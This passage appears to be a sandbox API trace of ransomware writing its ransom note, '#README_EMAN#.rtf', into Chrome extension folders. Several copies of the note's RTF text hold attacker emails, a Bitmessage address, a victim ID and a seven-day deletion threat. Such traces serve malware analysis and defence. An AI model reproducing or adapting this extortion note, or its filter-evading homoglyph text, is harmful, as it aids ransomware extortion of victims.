s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef9408, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nJ\x8eú\x10\x11\x13\x15ÔÒÅ3'g\x18ÂÉ=)ͪõ}Ó\x14", lpUsedDefaultChar=0x0) returned 8717 [0273.348] WriteFile (in: hFile=0x294, lpBuffer=0x1ef9408*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef9408*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0273.349] CloseHandle (hObject=0x294) returned 1 [0273.349] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\#readme_eman#.rtf")) returned 0xffffffff [0273.349] GetLastError () returned 0x2 [0273.349] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0273.350] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0273.350] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please 